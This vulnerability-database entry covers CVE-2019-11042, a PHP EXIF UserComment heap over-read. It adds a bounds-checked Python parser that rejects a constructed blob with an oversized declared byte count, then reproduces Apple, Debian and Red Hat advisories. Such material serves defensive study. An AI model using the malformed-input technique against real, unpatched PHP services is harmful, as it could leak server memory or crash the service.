VARIoT IoT vulnerabilities database
| VAR-201908-1841 | CVE-2019-11042 | PHP EXIF Buffer error vulnerability | CVSS V2: 5.8 | CVSS V3: 7.1 | Severity: HIGH |
When the PHP EXIF extension parses EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data that causes it to read past the allocated buffer. This may lead to information disclosure or a crash. PHP EXIF contains a buffer error vulnerability: information may be obtained, information may be altered, and service operation may be disrupted (DoS). PHP (PHP: Hypertext Preprocessor) is an open source general-purpose scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for web development and supports a variety of databases and operating systems. This vulnerability stems from incorrect verification of data boundaries when the product operates on memory, resulting in reads of adjacent memory locations outside the intended buffer. Attackers can exploit this vulnerability to cause a heap buffer over-read.
Successful exploitation has been reported as allowing malicious users to execute arbitrary code in the context of the affected application, although the upstream description characterises the flaw as an over-read (information disclosure or crash). Failed exploit attempts result in denial-of-service conditions.
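As an added example (not code from PHP's exif.c or from any of the advisories reproduced on this page), the following Python models the bug class behind this entry: a parser for the EXIF UserComment tag (0x9286) that checks the entry's declared byte count against the length of the EXIF payload before reading, and only inspects the 8-byte character-code prefix when at least 8 bytes are actually present. The build_exif() helper, the sample comments and the deliberately oversized declared count are constructed here for the demonstration; the checks shown are the general bounds checks a safe parser applies, not a transcription of the upstream fix.

```python
"""Bounds-checked parser for the EXIF UserComment tag (0x9286).

Added example, not PHP's exif.c. It models the bug class in this entry:
an IFD entry whose declared byte count reaches past the end of the EXIF
payload. A parser that trusts the count reads beyond its buffer; this one
validates every offset and length against len(data) before reading.
"""
import struct
from typing import Optional, Tuple

TAG_USER_COMMENT = 0x9286
TYPE_UNDEFINED = 7
# Character-code prefixes defined for UserComment (first 8 bytes of the value).
ENCODING_PREFIXES = {
    b"ASCII\x00\x00\x00": "ASCII",
    b"UNICODE\x00": "UNICODE",
    b"JIS\x00\x00\x00\x00\x00": "JIS",
    b"\x00" * 8: "UNDEFINED",
}


class ExifError(ValueError):
    """Raised for any malformed or out-of-bounds structure."""


def build_exif(user_comment: bytes, declared_count: Optional[int] = None) -> bytes:
    """Construct a minimal little-endian TIFF/EXIF blob whose IFD0 holds one
    entry, UserComment. This is a constructed sample for the demonstration;
    declared_count lets the caller lie about the byte count, which is the
    shape of a malformed file that triggers an over-read in a trusting parser."""
    count = len(user_comment) if declared_count is None else declared_count
    header = b"II" + struct.pack("<HI", 42, 8)  # byte order, magic 42, IFD0 at offset 8
    if declared_count is None and count <= 4:
        # Values of 4 bytes or fewer live inline in the 4-byte value field.
        entry = struct.pack("<HHI", TAG_USER_COMMENT, TYPE_UNDEFINED, count)
        entry += user_comment.ljust(4, b"\x00")
        tail = b""
    else:
        value_offset = 8 + 2 + 12 + 4  # header + entry count + one entry + next-IFD link
        entry = struct.pack("<HHII", TAG_USER_COMMENT, TYPE_UNDEFINED, count, value_offset)
        tail = user_comment
    ifd0 = struct.pack("<H", 1) + entry + struct.pack("<I", 0)
    return header + ifd0 + tail


def parse_user_comment(data: bytes) -> Tuple[str, bytes]:
    """Return (encoding, payload) for the UserComment entry or raise ExifError.
    Every slice is range-checked before it is taken."""
    if len(data) < 8 or data[:2] not in (b"II", b"MM"):
        raise ExifError("not a TIFF header")
    end = "<" if data[:2] == b"II" else ">"
    magic, ifd_off = struct.unpack(end + "HI", data[2:8])
    if magic != 42:
        raise ExifError("bad TIFF magic")
    if ifd_off + 2 > len(data):
        raise ExifError("IFD0 offset outside buffer")
    (n_entries,) = struct.unpack(end + "H", data[ifd_off:ifd_off + 2])
    entries_start = ifd_off + 2
    if entries_start + 12 * n_entries > len(data):
        raise ExifError("IFD0 entry table outside buffer")
    for i in range(n_entries):
        off = entries_start + 12 * i
        tag, typ, count, value = struct.unpack(end + "HHII", data[off:off + 12])
        if tag != TAG_USER_COMMENT:
            continue
        if typ != TYPE_UNDEFINED:
            raise ExifError("UserComment must be of type UNDEFINED")
        if count <= 4:
            raw = data[off + 8:off + 8 + count]  # inline value
        else:
            # The check whose absence yields a heap over-read: the declared
            # count must fit between the value offset and the end of the buffer.
            if value > len(data) or count > len(data) - value:
                raise ExifError("UserComment value extends past end of buffer")
            raw = data[value:value + count]
        # The 8-byte character-code prefix is only there when count >= 8;
        # comparing a shorter value against an 8-byte prefix would over-read.
        if len(raw) < 8:
            return "UNDEFINED", raw
        return ENCODING_PREFIXES.get(bytes(raw[:8]), "UNKNOWN"), raw[8:]
    raise ExifError("no UserComment entry in IFD0")


def safe_parse(data: bytes) -> Optional[Tuple[str, bytes]]:
    """Wrapper returning None instead of raising, for callers that only need
    an accept/reject decision on untrusted input."""
    try:
        return parse_user_comment(data)
    except ExifError:
        return None


if __name__ == "__main__":
    print(safe_parse(build_exif(b"ASCII\x00\x00\x00hello")))
    print(safe_parse(build_exif(b"ASCII\x00\x00\x00hello", declared_count=4096)))
```

The two calls at the bottom show the accept and reject paths: the first blob is well-formed and yields ("ASCII", b"hello"); the second declares 4096 bytes for a 13-byte value and is rejected before any read happens. The same offset-plus-count check applies to every IFD entry type, not just UserComment, and the prefix length check is the pattern for any field with a fixed-size header inside a variable-length value.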
PHP versions before 7.3.8 are vulnerable.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2019-10-29-10 Additional information
for APPLE-SA-2019-10-07-1 macOS Catalina 10.15
macOS Catalina 10.15 addresses the following:
AMD
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8748: Lilang Wu and Moony Li of TrendMicro Mobile Security
Research Team
apache_mod_php
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Multiple issues in PHP
Description: Multiple issues were addressed by updating to PHP
version 7.3.8.
CVE-2019-11041
CVE-2019-11042
Audio
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8706: Yu Zhou of Ant-financial Light-Year Security Lab
Entry added October 29, 2019
Books
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Parsing a maliciously crafted iBooks file may lead to a
persistent denial-of-service
Description: A resource exhaustion issue was addressed with improved
input validation.
CVE-2019-8774: Gertjan Franken imec-DistriNet of KU Leuven
Entry added October 29, 2019
CFNetwork
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: This issue was addressed with improved checks.
CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland
Entry added October 29, 2019
CoreAudio
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing a maliciously crafted movie may result in the
disclosure of process memory
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative
CoreCrypto
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing a large input may lead to a denial of service
Description: A denial of service issue was addressed with improved
input validation.
CVE-2019-8741: Nicky Mouha of NIST
Entry added October 29, 2019
CoreMedia
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8825: Found by GWP-ASan in Google Chrome
Entry added October 29, 2019
Crash Reporter
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: The "Share Mac Analytics" setting may not be disabled when a
user deselects the switch to share analytics
Description: A race condition existed when reading and writing user
preferences. This was addressed with improved state handling.
CVE-2019-8757: William Cerniuk of Core Development, LLC
CUPS
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An attacker in a privileged network position may be able to
leak sensitive user information
Description: An input validation issue was addressed with improved
input validation.
CVE-2019-8736: Pawel Gocyla of ING Tech Poland (ingtechpoland.com)
Entry added October 29, 2019
CUPS
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing a maliciously crafted string may lead to heap
corruption
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2019-8767: Stephen Zeisberg
Entry added October 29, 2019
CUPS
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An attacker in a privileged position may be able to perform a
denial of service attack
Description: A denial of service issue was addressed with improved
validation.
CVE-2019-8737: Pawel Gocyla of ING Tech Poland (ingtechpoland.com)
Entry added October 29, 2019
File Quarantine
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: A malicious application may be able to elevate privileges
Description: This issue was addressed by removing the vulnerable
code.
CVE-2019-8509: CodeColorist of Ant-Financial LightYear Labs
Entry added October 29, 2019
Foundation
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: A remote attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8746: Natalie Silvanovich and Samuel Groß of Google Project
Zero
Entry added October 29, 2019
Graphics
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing a malicious shader may result in unexpected
application termination or arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2018-12152: Piotr Bania of Cisco Talos
CVE-2018-12153: Piotr Bania of Cisco Talos
CVE-2018-12154: Piotr Bania of Cisco Talos
Entry added October 29, 2019
Intel Graphics Driver
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8758: Lilang Wu and Moony Li of Trend Micro
IOGraphics
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: A malicious application may be able to determine kernel
memory layout
Description: A logic issue was addressed with improved restrictions.
CVE-2019-8755: Lilang Wu and Moony Li of Trend Micro
IOGraphics
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: A local user may be able to cause unexpected system
termination or read kernel memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-8759: another of 360 Nirvan Team
Entry added October 29, 2019
Kernel
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: A local app may be able to read a persistent account
identifier
Description: A validation issue was addressed with improved logic.
CVE-2019-8809: Apple
Entry added October 29, 2019
Kernel
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8709: derrek (@derrekr6)
CVE-2019-8781: Linus Henze (pinauten.de)
Entry added October 29, 2019
Kernel
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8717: Jann Horn of Google Project Zero
Kernel
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory corruption issue existed in the handling of
IPv6 packets. This issue was addressed with improved memory
management.
CVE-2019-8744: Zhuo Liang of Qihoo 360 Vulcan Team
Entry added October 29, 2019
libxml2
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Multiple issues in libxml2
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2019-8749: found by OSS-Fuzz
CVE-2019-8756: found by OSS-Fuzz
Entry added October 29, 2019
libxslt
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Multiple issues in libxslt
Description: Multiple memory corruption issues were addressed with
improved input validation.
CVE-2019-8750: found by OSS-Fuzz
Entry added October 29, 2019
mDNSResponder
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An attacker in physical proximity may be able to passively
observe device names in AWDL communications
Description: This issue was resolved by replacing device names with a
random identifier.
CVE-2019-8799: David Kreitschmann and Milan Stute of Secure Mobile
Networking Lab at Technische Universität Darmstadt
Entry added October 29, 2019
Menus
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8826: Found by GWP-ASan in Google Chrome
Entry added October 29, 2019
Notes
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: A local user may be able to view a user's locked notes
Description: The contents of locked notes sometimes appeared in
search results. This issue was addressed with improved data cleanup.
CVE-2019-8730: Jamie Blumberg (@jamie_blumberg) of Virginia
Polytechnic Institute and State University
PDFKit
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An attacker may be able to exfiltrate the contents of an
encrypted PDF
Description: An issue existed in the handling of links in encrypted
PDFs. This issue was addressed by adding a confirmation prompt.
CVE-2019-8772: Jens Müller of Ruhr University Bochum, Fabian Ising
of FH Münster University of Applied Sciences, Vladislav Mladenov
of Ruhr University Bochum, Christian Mainka of Ruhr University
Bochum, Sebastian Schinzel of FH Münster University of Applied
Sciences, and Jörg Schwenk of Ruhr University Bochum
PluginKit
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: A local user may be able to check for the existence of
arbitrary files
Description: A logic issue was addressed with improved restrictions.
CVE-2019-8708: an anonymous researcher
Entry added October 29, 2019
PluginKit
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8715: an anonymous researcher
Entry added October 29, 2019
SharedFileList
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: A malicious application may be able to access recent
documents
Description: The issue was addressed with improved permissions logic.
CVE-2019-8770: Stanislav Zinukhov of Parallels International GmbH
sips
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8701: Simon Huang(@HuangShaomang), Rong Fan(@fanrong1992)
and pjf of IceSword Lab of Qihoo 360
UIFoundation
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Parsing a maliciously crafted text file may lead to
disclosure of user information
Description: This issue was addressed with improved checks.
CVE-2019-8761: Renee Trisberg of SpectX
Entry added October 29, 2019
UIFoundation
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Processing a maliciously crafted text file may lead to
arbitrary code execution
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8745: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative
WebKit
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: A user may be unable to delete browsing history items
Description: "Clear History and Website Data" did not clear the
history. The issue was addressed with improved data deletion.
CVE-2019-8768: Hugo S. Diaz (coldpointblue)
WebKit
Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012
and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and
later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro
(Late 2013 and later)
Impact: Visiting a maliciously crafted website may reveal browsing
history
Description: An issue existed in the drawing of web page elements.
The issue was addressed with improved logic.
CVE-2019-8769: Piérre Reimertz (@reimertz)
Additional recognition
AppleRTC
We would like to acknowledge Vitaly Cheptsov for their assistance.
Audio
We would like to acknowledge riusksk of VulWar Corp working with
Trend Micro's Zero Day Initiative for their assistance.
boringssl
We would like to acknowledge Nimrod Aviram of Tel Aviv University,
Robert Merget of Ruhr University Bochum, Juraj Somorovsky of Ruhr
University Bochum and Thijs Alkemade (@xnyhps) of Computest for their
assistance.
Finder
We would like to acknowledge Csaba Fitzl (@theevilbit) for their
assistance.
Gatekeeper
We would like to acknowledge Csaba Fitzl (@theevilbit) for their
assistance.
Identity Service
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
mDNSResponder
We would like to acknowledge Gregor Lang of e.solutions GmbH for
their assistance.
python
We would like to acknowledge an anonymous researcher for their
assistance.
Safari Data Importing
We would like to acknowledge Kent Zoya for their assistance.
Simple certificate enrollment protocol (SCEP)
We would like to acknowledge an anonymous researcher for their
assistance.
Telephony
We would like to acknowledge Phil Stokes from SentinelOne for their
assistance.
VPN
We would like to acknowledge Royce Gawron of Second Son Consulting,
Inc. for their assistance.
Installation note:
macOS Catalina 10.15 may be obtained from the Mac App Store or
Apple's Software Downloads web site:
https://support.apple.com/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----
For the stable distribution (buster), these problems have been fixed in
version 7.3.9-1~deb10u1.
We recommend that you upgrade your php7.3 packages.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: rh-php72-php security update
Advisory ID: RHSA-2019:3299-01
Product: Red Hat Software Collections
Advisory URL: https://access.redhat.com/errata/RHSA-2019:3299
Issue date: 2019-11-01
CVE Names: CVE-2016-10166 CVE-2018-20783 CVE-2019-6977
CVE-2019-9020 CVE-2019-9021 CVE-2019-9022
CVE-2019-9023 CVE-2019-9024 CVE-2019-9637
CVE-2019-9638 CVE-2019-9639 CVE-2019-9640
CVE-2019-11034 CVE-2019-11035 CVE-2019-11036
CVE-2019-11038 CVE-2019-11039 CVE-2019-11040
CVE-2019-11041 CVE-2019-11042 CVE-2019-11043
=====================================================================
1. Summary:
An update for rh-php72-php is now available for Red Hat Software
Collections.
Red Hat Product Security has rated this update as having a security impact
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64le, s390x, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5) - ppc64le, s390x, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - ppc64le, s390x, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7) - ppc64le, s390x, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Server.
The following packages have been upgraded to a later upstream version:
rh-php72-php (7.2.24). (BZ#1766603)
Security Fix(es):
* php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)
* gd: Unsigned integer underflow _gdContributionsAlloc() (CVE-2016-10166)
* gd: Heap based buffer overflow in gdImageColorMatch() in gd_color_match.c
(CVE-2019-6977)
* php: Invalid memory access in function xmlrpc_decode() (CVE-2019-9020)
* php: File rename across filesystems may allow unwanted access during
processing (CVE-2019-9637)
* php: Uninitialized read in exif_process_IFD_in_MAKERNOTE (CVE-2019-9638)
* php: Uninitialized read in exif_process_IFD_in_MAKERNOTE (CVE-2019-9639)
* php: Invalid read in exif_process_SOFn() (CVE-2019-9640)
* php: Out-of-bounds read due to integer overflow in
iconv_mime_decode_headers() (CVE-2019-11039)
* php: Buffer over-read in exif_read_data() (CVE-2019-11040)
* php: Buffer over-read in PHAR reading functions (CVE-2018-20783)
* php: Heap-based buffer over-read in PHAR reading functions
(CVE-2019-9021)
* php: memcpy with negative length via crafted DNS response (CVE-2019-9022)
* php: Heap-based buffer over-read in mbstring regular expression functions
(CVE-2019-9023)
* php: Out-of-bounds read in base64_decode_xmlrpc in
ext/xmlrpc/libxmlrpc/base64.c (CVE-2019-9024)
* php: Heap buffer overflow in function exif_process_IFD_TAG()
(CVE-2019-11034)
* php: Heap buffer overflow in function exif_iif_add_value()
(CVE-2019-11035)
* php: Buffer over-read in exif_process_IFD_TAG() leading to information
disclosure (CVE-2019-11036)
* gd: Information disclosure in gdImageCreateFromXbm() (CVE-2019-11038)
* php: heap buffer over-read in exif_scan_thumbnail() (CVE-2019-11041)
* php: heap buffer over-read in exif_process_user_comment()
(CVE-2019-11042)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
After installing the updated packages, the httpd daemon must be restarted
for the update to take effect.
5. Bugs fixed (https://bugzilla.redhat.com/):
1418983 - CVE-2016-10166 gd: Unsigned integer underflow _gdContributionsAlloc()
1672207 - CVE-2019-6977 gd: Heap based buffer overflow in gdImageColorMatch() in gd_color_match.c
1680545 - CVE-2018-20783 php: Buffer over-read in PHAR reading functions
1685123 - CVE-2019-9020 php: Invalid memory access in function xmlrpc_decode()
1685132 - CVE-2019-9021 php: Heap-based buffer over-read in PHAR reading functions
1685398 - CVE-2019-9023 php: Heap-based buffer over-read in mbstring regular expression functions
1685404 - CVE-2019-9024 php: Out-of-bounds read in base64_decode_xmlrpc in ext/xmlrpc/libxmlrpc/base64.c
1685412 - CVE-2019-9022 php: memcpy with negative length via crafted DNS response
1688897 - CVE-2019-9637 php: File rename across filesystems may allow unwanted access during processing
1688922 - CVE-2019-9638 php: Uninitialized read in exif_process_IFD_in_MAKERNOTE
1688934 - CVE-2019-9639 php: Uninitialized read in exif_process_IFD_in_MAKERNOTE
1688939 - CVE-2019-9640 php: Invalid read in exif_process_SOFn()
1702246 - CVE-2019-11035 php: Heap buffer overflow in function exif_iif_add_value()
1702256 - CVE-2019-11034 php: Heap buffer overflow in function exif_process_IFD_TAG()
1707299 - CVE-2019-11036 php: Buffer over-read in exif_process_IFD_TAG() leading to information disclosure
1724149 - CVE-2019-11038 gd: Information disclosure in gdImageCreateFromXbm()
1724152 - CVE-2019-11039 php: Out-of-bounds read due to integer overflow in iconv_mime_decode_headers()
1724154 - CVE-2019-11040 php: Buffer over-read in exif_read_data()
1739459 - CVE-2019-11041 php: heap buffer over-read in exif_scan_thumbnail()
1739465 - CVE-2019-11042 php: heap buffer over-read in exif_process_user_comment()
1766378 - CVE-2019-11043 php: underflow in env_path_info in fpm_main.c
6. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
rh-php72-php-7.2.24-1.el7.src.rpm
aarch64:
rh-php72-php-7.2.24-1.el7.aarch64.rpm
rh-php72-php-bcmath-7.2.24-1.el7.aarch64.rpm
rh-php72-php-cli-7.2.24-1.el7.aarch64.rpm
rh-php72-php-common-7.2.24-1.el7.aarch64.rpm
rh-php72-php-dba-7.2.24-1.el7.aarch64.rpm
rh-php72-php-dbg-7.2.24-1.el7.aarch64.rpm
rh-php72-php-debuginfo-7.2.24-1.el7.aarch64.rpm
rh-php72-php-devel-7.2.24-1.el7.aarch64.rpm
rh-php72-php-embedded-7.2.24-1.el7.aarch64.rpm
rh-php72-php-enchant-7.2.24-1.el7.aarch64.rpm
rh-php72-php-fpm-7.2.24-1.el7.aarch64.rpm
rh-php72-php-gd-7.2.24-1.el7.aarch64.rpm
rh-php72-php-gmp-7.2.24-1.el7.aarch64.rpm
rh-php72-php-intl-7.2.24-1.el7.aarch64.rpm
rh-php72-php-json-7.2.24-1.el7.aarch64.rpm
rh-php72-php-ldap-7.2.24-1.el7.aarch64.rpm
rh-php72-php-mbstring-7.2.24-1.el7.aarch64.rpm
rh-php72-php-mysqlnd-7.2.24-1.el7.aarch64.rpm
rh-php72-php-odbc-7.2.24-1.el7.aarch64.rpm
rh-php72-php-opcache-7.2.24-1.el7.aarch64.rpm
rh-php72-php-pdo-7.2.24-1.el7.aarch64.rpm
rh-php72-php-pgsql-7.2.24-1.el7.aarch64.rpm
rh-php72-php-process-7.2.24-1.el7.aarch64.rpm
rh-php72-php-pspell-7.2.24-1.el7.aarch64.rpm
rh-php72-php-recode-7.2.24-1.el7.aarch64.rpm
rh-php72-php-snmp-7.2.24-1.el7.aarch64.rpm
rh-php72-php-soap-7.2.24-1.el7.aarch64.rpm
rh-php72-php-xml-7.2.24-1.el7.aarch64.rpm
rh-php72-php-xmlrpc-7.2.24-1.el7.aarch64.rpm
rh-php72-php-zip-7.2.24-1.el7.aarch64.rpm
ppc64le:
rh-php72-php-7.2.24-1.el7.ppc64le.rpm
